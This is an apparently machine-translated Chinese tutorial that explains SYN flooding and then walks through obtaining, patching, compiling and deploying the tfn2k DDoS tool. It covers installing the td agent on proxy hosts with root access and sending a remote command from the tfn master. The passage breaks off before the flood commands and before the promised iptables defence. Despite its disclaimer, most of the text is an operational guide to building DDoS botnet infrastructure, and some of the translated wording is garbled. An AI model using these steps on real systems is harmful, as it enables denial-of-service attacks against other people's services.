Distributed denial of service attack and iptables filtering test

Article title: Distributed Denial of Service attack and iptables filtering test. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
First of all, the purpose of writing this article is not why I want to be a hacker, and I do not encourage anyone to use it to do something detrimental to others, I just want more people to pay attention to network security and work together to study and defend against DOS. This article is only for technical reference for you to study DDOS defense. If you use it to do something illegal, the result is irrelevant to me.
　　
Denial Of Service (DOS) attacks can be any operation that makes the Service unavailable. Such as software bugs and operation errors. However, the dos caused by misoperations is very unlikely and more likely to be malicious attacks. Nowadays, Denial-Of-Service (DoS) attacks have evolved into Distributed Denial-Of-Service (DDOS) attacks. more proxies are used to attack targets in a centralized manner, causing greater harm.
　　
We all know that TCP/IP has now become the entire internet framework protocol. it can be said that without TCP/IP, at least the internet will not become as popular as it is now, or even impossible to have an internet. However, everything has two sides. TCP/IP has benefited all of us. at the same time, due to the structure of the protocol itself, it has become a tool for others to attack us. The tcp three-way handshake is used to establish the connection.
　　
I. tcp syn flood
　　
1. the client sends a tcp packet containing SYN (synchronize) to the server, which contains basic information such as the client port and tcp serial number.
　　
2. after the server receives the SYN packet, a SYN-ACK packet is sent for confirmation.
　　
3. after the client receives the server's SYN-ACK package, it will send back ACK to the server, if the server receives this package, the TCP connection is established, the two sides can communicate (feeling like, a new world... 2. worship the high hall... sent to the cave room... haha)
　　
The problem lies in step 1. if the server cannot receive the ACK package from the client, it will wait. this status is called semi-connection. It will remain for a certain period of time (different operating systems at different times). if The SYN request exceeds the server's capacity limit and the buffer queue is full, the server will no longer receive new requests, connections of other legal users are rejected. This type of attack is often half a "sin", and is extremely lethal.
　　
Of course, there are a variety of DOS attack methods, such as UDP flood, ICMP/Ping, ICMP/SMURF.... for details about the principles, refer. But speaking of DOS attack software, the most representative is tfn2k (Tribe Flood Network 2000), its author is Germany's famous mixter (its home page http://mixter.void.ru/papers.html), it seems that recently is working on what tfn3k, ah ~~, I don't know how many people have difficulty in food...
　　
II. Principles of tfn2k attacks
　　
1. tfn2k attack system.
　　
Tfn2k should be regarded as a masterpiece of DDOS attacks. The functions it can achieve are staggering and amazing... (the reverence for it is like a continuous stream of rivers and rivers ...) let's take a look at its architecture.
　　
Master-run the tfn client to remotely control and specify the attack target, and change the attack method)
　　
Proxy: the victim of the implanted and running td process. the attacker accepts the command of tfn and the attacker of the attack. it should be noted that an attacker often controls multiple proxies to perform attacks, and most of the systems are unix and linux. (poor victim)
　　
Target host-attacked host or network, which has been attacked by Yahoo, Amazon, CNN, and e-bay (the biggest victim, such as me)
　　
2. tfn2k features.
　　
◆ The Master uses one of them through TCP, UDP, ICMP, or randomness (default. random) data packets send commands to the proxy Host. attack methods include TCP/SYN, UDP, ICMP/PING, hybrid attack, and targa3.
　　
◆ Communication between the master and proxy is one-way. that is, the master sends commands only to the proxy, and takes random header information or even virtual source address information, the proxy does not send any information to the master.
　　
◆ All commands are killed by the CAST-256 algorithm. The keyword is the password entered during program compilation, and this password is used as the unique authentication credential.
　　
◆ Using the td process, the master can remotely execute shell commands.
　　
◆ The td process name can be changed during compilation for easier hiding.
　　
◆ Tfn can be compiled and run on win32 and linux systems.
　　
...
　　
As for functions such as counterfeit source IP addresses, it is also a basic function, and it is more efficient than the old version of tfn. I tested it in less than five minutes, the two proxies paralyzed my redhat linux 9.0 system.
　　
III. tfn2k practical test
　　
1. test environment:
　　
Software: redhat linux 9.0
Hardware Platform:
Master:
IP: 192.168.0.6
PIV2.4/256*2/rtl8139
Ag1:
IP: 192.168.0.2
PIV2.4/256 */rtl8139
AG2: IP: 192.168.0.3
PIV2.6/512*2/3c905
AIM: 192.168.0.5
PIV2.66c/512*2/3c905
Switch: D_link des 1024R
　　
1. download tfn2k. tgz (because this software is unusual, I don't provide it. if you are interested, find it online)
　　
2. decompress: tar zxvf tfn2k. tgz
　　
3. modify the file
　　
A. src/Makefile if your system is A linux system, you do not need to perform any repairs. if it is A win32 system, set
# Linux/* BSD */Others
CC = gcc
CFLAGS =-Wall-O3
CLIBS =
　　
Comment out the lines and
# Win32 (cygwin)
# CC = gcc
# CFLAGS =-Wall-d1_ze-O2
# CLIBS =
　　
The comments of these lines are removed. because my testing system is redhat linux 9.0, no modifications have been made.
　　
B. src/config. h, which can be used by default. if you are interested, you can adjust it according to the comment.
　　
C. src/ip. h. make some changes here. Otherwise, the compilation will be wrong and the definition will be repeated.
/* Struct in_addr
{
Unsigned long int s_addr;
};*/
　　
Note that ~~ I put it between "/**/", that is, commented out :)
　　
D. change the compiler:
　　
Because tfn2k supports egcs-1.1.2-30, and redhat linux9.0 contains gcc-3.2.2-5, so if gcc is not replaced, tfn2k is not compiled. it should be noted that, after the change, it may cause the gcc3.2.2-based software compilation to fail, so proceed with caution.
　　
The method is very simple, find a redhat linux 6.2 Installation disk, copy the egcs-1.1.2-30.rpm, cpp-1.1.2-30.rpm ~ /
Cd/mnt/cdrom/Redhat/RPMS
Cp egcs-1.1.2-30 * cpp-1.1.2-30 *~ /
　　
Install cpp rpm-Uvh -- nodeps -- oldpackage cpp-1.1.2-30.i386.rpm
　　
Install egcs rpm-Uvh egcs-1.1.2-30.i386.rpm
　　
(If the error message is displayed, ignore it with parameters such as nodeps, oldpackages, and ignoreos)
　　
4. compile tfn2k
Cd tfn2k/src
Make
　　
First, let's talk about a statement that you must accept. then, you will be prompted to enter the 8-32-bit password. as mentioned above, this is the only authentication credential and will be distributed to the td process, so remember it ~.
　　
After compilation, td and tfn will be generated, which is the famous tfn2k ~, Td is a daemon used for agent installation, while tfn is the control end.
　　
5. install td.
　　
Upload td to my two proxies, ag1 (192.168.0.2) and ag2 (192.168.0.3). because I only perform the test, I use a valid root account to upload and execute the td process, if you really want to find and install a proxy, you may have to worry about it, because no administrator will say "come on baby ~~. I will give you root, and install td as a proxy"
[Root @ test/] ftp 192.168.0.2
Connected to 192.168.0.2.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
Name (192.168.0.2: root): wjpfjy
331 Please specify the password.
Password:
230 Login successful. Have fun.
Remote system type is UNIX.
Using binary mode to transfer files.
Ftp> put td (Upload td)
Local: td remote: td
227 Entering Passive Mode (192,168, 198,225)
553 cocould not create file.
Ftp> by (exit ftp)
221 Goodbye.
　　
[Root @ test/] ssh 192.168.0.2
// Log on to ag1 to execute td. Note that I use the root account so that I have sufficient permissions to execute it.
Root@192.168.0.2's password:
Last login: Tue Feb 24 06:51:13 2004
[Root @ ag1/] find/-name td-print
// Find the uploaded file td.
[Root @ ag1 wjpfjy/] chmod a + x td
// Give it the execution permission.
[Root @ ag1 wjpfjy/]./td
// Run td, so that you have a proxy, which will be the only one for you :(.
　　
Install and run the TFN2k process td on ag2 (192.168.0.3) in the same way.
　　
6. the attack begins (tragic memories are being staged ...)
　　
Go back to the master (192.168.0.6) and prepare for the drill...
[Root @ master root] # touch host.txt
// Create a proxy record File (because many bots may be created if you are bored enough-
// Proxy. if you don't remember it, you will forget it .)
[Root @ master root] echo "192.168.0.2"> host.txt adds TDX ag1to host.txt.
[Root @ master root] echo "192.168.0.3"> host.txt mongoag2to host.txt.
　　
Test the link first.
　　
[Root @ master root]./tfn-f host.txt-c 10-I "mkdir wjpfjy" communicates with the proxy in host.txt. run mkdir wjpfjy to create a directory.
Protocol: random
Source IP: random
Client input: list
Command: execute remote command
　　
Password verification:
// Here, you will be prompted to enter the password, that is, the password entered during compilation. if it is wrong, it will not be able to communicate with the td process
　　
Sending out packets :..
　　
Go to ag1 and ag2 to check whether the directory name wjpfjy is created. generally,